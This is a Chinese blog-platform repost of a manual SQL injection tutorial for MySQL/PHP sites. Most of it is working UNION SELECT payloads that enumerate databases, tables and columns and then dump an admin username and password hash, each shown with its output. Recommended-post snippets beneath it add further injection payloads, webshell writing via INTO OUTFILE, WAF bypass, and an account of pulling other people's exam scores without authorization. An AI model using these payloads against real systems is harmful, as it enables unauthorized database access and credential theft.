网站爆库php,[原创]WEB安全第四章SQL注入篇05 mysql+php 手工注入篇 爆库 爆表 爆字段...

最新推荐文章于 2024-07-25 10:25:02 发布
最新推荐文章于 2024-07-25 10:25:02 发布
阅读量193 收藏
点赞数
文章标签: 网站爆库php
本文详细介绍如何使用手工SQL注入方法获取数据库中的信息,包括查询所有数据库、表和字段名称,以及具体数据内容。通过实例演示了如何利用group_concat()函数进行数据爆破。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[原创]WEB安全第四章SQL注入篇05 mysql+php 手工注入篇 爆库 爆表 爆字段

在上面一章mysql+php手工注入篇  在最后用到的一个函数 group_concat()可以将查询的字段的数据查询出来

可以用利这个函数 将mysql所有的库名查询出来

1、查询所有的库

http://target_sys.com/article.php?id=-1

union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1

http://target_sys.com/article.php?id=-1

union select 1,2,group_concat(SCHEMA_NAME) from information_schema.SCHEMATA

information_schema,blogs,mysql,performance_schema,target_sys,test,wordpress

2、查询库里所有的表

http://target_sys.com/article.php?id=-1

union select 1,2,group_concat(TABLE_NAME) from information_schema.TABLES where

TABLE_SCHEMA=database()

admin,article,moon_range,users

3、查询表里所有的字段

http://target_sys.com/article.php?id=-1

union select 1,2,group_concat(COLUMN_NAME) from information_schema.COLUMNS where

TABLE_NAME=0x61646d696e

id,username,password

4、查询数据

http://target_sys.com/article.php?id=-1

union select 1,2,group_concat(username,0x3a,password) from admin

admin:e10adc3949ba59abbe56e057f20f883e

5、查询失败的原因

这种方面不是通用的,有时候 查询不全 这个原因是字段的大小问题。解决办法 换一个字段查询,或者 用函数查询长度再用字符串函数截取。这种方法将会在下面介绍。

lazy.png

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/archives/167

兔农农
关注
php mysql4.1.20 注入爆表_PHPCMS-2008 SP4命令注入漏洞分析(CVE-2018-19127)
weixin_32450633的博客
01-28 586
在说这个漏洞之前,我们先需要了解phpcms的一个机制,就是类似于全局变量注册的一个东西,方便于程序员的开发,很多的CMS都会通过代码实现这样一套机制.这套机制类似于早先php版本中的register_globals,后来因为安全问题,在5.30后被废除了,因此很多cms自己实现,但因为安全问题,这样机制一般会经过比较严格的过滤.我们来看phpcms,在common.inc.php中,通过if($...
渗透测试——sql手工注入实战 @apache+php+Mysql 正则注入
aming小老弟
07-05 98
0x01 Mysql 手工注入 1.1 联合注入 登录后复制 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from informat...
web渗透之暴
分享观点和经验,欢迎交流。
04-18 3306
从本次文章开始,将正式进入web渗透测试,本次将通过实际操作实现暴,内容包括:cms判断、暴、后台查找、密码破解。1、判断cms判断目标:脚本语言、操作系统、搭建平台、cms厂商使用工具:wvs、wwwscan、站长工具、whatweb、googlehack2、暴什么是暴?就是通过一些技术手段或者程序漏洞得到数据的地址,并将数据非法下载到本地。方法:inurl:/inc/conn.asp...
绕过waf mysql_那些年干过的事(二)—成绩查询网站及防护
weixin_39535349的博客
02-12 139
背景:某考试系统公布了考试成绩,很多朋友参加了这个考试,当时手上没有他们的考试号等信息,又比较好奇大家的成绩,一时兴起就想看看有没有方法在不知道考试号的情况下查询成绩。目的:获得大家的考试成绩。条件:网站采用php开发,数据类型未知,表结构未知工具及手段:google、UE、Sqlyog、SQL注入、Eclipse前期准备:在网站提供的查询界面中,通过在各个输入框输入特殊字符单引号发现,输入框都...
%5C
eldn__的专栏
12-05 2934
当我们暴失败的时候不妨试试利用%5c绕过asp的验证 废话少说,看下面的代码:      guest_user=trim(request("guest_user"))   guest_password=trim(request("guest_password"))   Set rs= Server.createObject("ADODB.Recordset")   sql=
Web漏洞-SQL注入(上)
Ays.Ie的博客
03-06 752
web漏洞-SQL注入(上)
18-OWASP top10--SQL注入(三、MSSQLMysql手工注入Sqlmap工具使用)
XLbb的博客
05-27 1480
' 与and 1=1 and 1=2--检查注入点 ' order by 1,2--+&Submit=Submit#--检查字段 ' union select user(),version()--+&Submit=Submit# --查看数据用户名和版本、名 'union select 1,group_concat(schema_name) from inform 注入防御 1、涵数过滤 2、直接下载相关防范注入文件,通过incloud包含放在网站配置文件里面 3、PDO预处理
MOZHE SQL手工注入漏洞测试(MySQL数据)
最新发布
2202_75354817的博客
07-25 497
墨者靶场 SQL手工注入漏洞测试(MySQL数据)
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2631
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
SQL注入-MySQL手工注入语法大全
qq_41579182的博客
09-29 652
判断是否存在SQL注入 ’ and 1=1 and 1=2 暴字段长度 Order by 数字 匹配字段 and 1=1 union select 1,2,…,n 暴字段位置 and 1=2 union select 1,2,…,n 利用内置函数暴数据信息 version() database() user() 不用猜解可用字段暴数据信息(有些网站不适用): and 1=...
mysql_利用MySQL的报错进行
weixin_35775969的博客
02-03 1416
在这里主要是利用mysql数据的一个bug1、报错原理,一步一步分析select count(*),concat((select version()),0x7E,left(rand(),3))x from information_schema.tables group by x;从图中可以看出,版本号是5.6.17拿来实战,查询mysql数据中的user表select * from user ...
PHP盲注常用暴表等等语句
收集盒 Book box
07-08 1689
判断版本号(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by
php+mysql+手工_PHP+MySQL环境下的SQL手工注入教程
weixin_35916518的博客
01-19 396
1)检测是否存在注入点假设我们现在有形如http://www.pengoz.cn/news.php?id=5的URL,现在我们在URL后面添加单引号“ ‘ ”(英文输入法的单引号—CCOz注),则URL变成了http://www.pengoz.cn/news.php?id=5′如果得到了一些错误信息形如“error in sql syntax,check the manual … ”等等,那就意味...
php路径方法总结
风流剑客
12-16 1480
1、单引号路径   直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。   www.xxxx.com /news.php?id=149′   2、错误参数值路径   将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。   www.xxxx.com /researcharchive.php?id=-1   3
%5c实例
eldn__的专栏
12-07 2033
来源:转载 作者:佚名 时间:2005-10-17 07:09:13 作者:fhod 入侵QQ挂机网实施钓鱼攻击(已发表在黑客X档案05.10) 前不久上QQ老是收到好友挂机的信息..这次看到我同学发来的信息..无意中打开..看排名不错..突然就有了想 入侵它的冲动 QQ挂机的页面没什么看头..看看主站.ASP的..试了几个连接尝试SQL注入..失败...然后就想着找二
19、网站渗透:常见暴漏洞的原理和实践
郭盛华的优快云技术博客
10-14 1089
主讲老师:郭盛华   暴,就是通过一些技术手段或者程序漏洞得到数据的地址,并将数据非法下载到本地。黑客非常乐意于这种工作,为什么呢?因为黑客在得到网站数据后,就能得到网站管理账号,对网站进行破坏与管理,黑客也能通过数据得到网站用户的隐私信息,甚至得到服务器的最高权限。   在暴的漏洞历史中,要数单引号过滤不严漏洞最为经典,入侵者只要加单引号就能暴。这个漏洞危害非常大,曾经导致...
php mysql 手工_网络安全系列之十八 MySQL基本操作(PHP注入基础)
weixin_34779096的博客
02-19 220
在之前的博文中曾介绍过如何对ASP网站进行手工注入,ASP网站大都是采用ACCESS或MSSQL数据,因而所谓针对ASP的SQL注入其实也就是根据ACCESS或MSSQL数据的特点来构造查询语句。除此之外,对于PHP网站则大都是采用MySQL数据,这里要进行手工注入时所使用的查询语句与之前就不相同了,而且相对比较复杂。为了更好地理解,在进行针对PHP网站注入之前,有必要先了解一些MySQL...
SQL注入渗透测试(初学者必看)
yi152787的博客
04-30 2520
原理基本一致的,也许站点不同但只要存在sql注入则需要进行数据破,步骤及使用的参数基本相同,对参数不够熟悉的网友可以去某百某博查看相关信息,本次实验结束,本文章仅提供参考,请勿在未授权的情况下进行测试。本次实验利用sqlmap破工具对SQL靶场进行渗透测试(数据破),最终目标:拿到用户名和密码,实验中页面出现的用户名密码可忽略,真实实战中一般不会直接出用户名和密码的。5.在security出users,已确定目标所在,进行第三步破 所使用到的参数 -D -T --colimn;
如何利用SQL注入进行
热门推荐
海枫的专栏
10-30 2万+
SQL注入可以完全,不相信,进来看看,本文一步步介绍的原理和步骤。
如何使用sqlmap和挂马
Leslieyzz的博客
01-19 3651
如何使用sqlmap和挂马的技术博客
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值